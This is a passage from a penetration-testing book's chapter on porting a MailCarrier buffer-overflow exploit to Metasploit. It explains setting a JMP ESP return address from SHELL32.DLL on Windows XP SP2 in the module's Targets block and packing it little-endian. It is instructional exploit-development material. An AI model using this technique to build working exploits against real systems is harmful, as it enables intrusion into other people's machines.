background image

Porting Exploits to the Metasploit Framework

221

Figure 15-1: MailCarrier initial overwrite

Implementing Features of the Framework

Having proved that the basic skeleton of the module works by overwriting 
our EIP address, we can slowly start to implement the features of the Frame-
work. We begin by setting the target return address (shown in bold in the fol-
lowing example) in the 

'Targets'

 block to a JMP ESP address. This is the same 

address that was used in the original exploit; it’s found in 

SHELL32.DLL

 on 

Windows XP SP2. We need to find a legitimate return address to ensure 
that our code executes properly on the operating system we are targeting. 
Remember that some exploits work only on specific operating systems, as 
is the case with this exploit. We are using an address from 

SHELL32.DLL

which will change across different versions or service packs. If we were to find 
a standard JMP ESP in the application’s memory address, we would not need 
to use a Windows DLL and could make this exploit universal to all Windows 
platforms, because the memory addresses would never change.

'Targets' =>
       [
              [ 'Windows XP SP2 - EN', { 'Ret' => 

0x7d17dd13

 } ],

       ],

Metasploit will add the return address into the exploit at run time. You can 

replace the return address in the exploit block with 

[target['Ret']].pack('V')

This will insert the target return address into the exploit, reversing the bytes 
in little-endian format. (The endian-ness is determined by the target CPU’s 
architecture, and processors that are Intel-compatible use little-endian byte 
ordering.)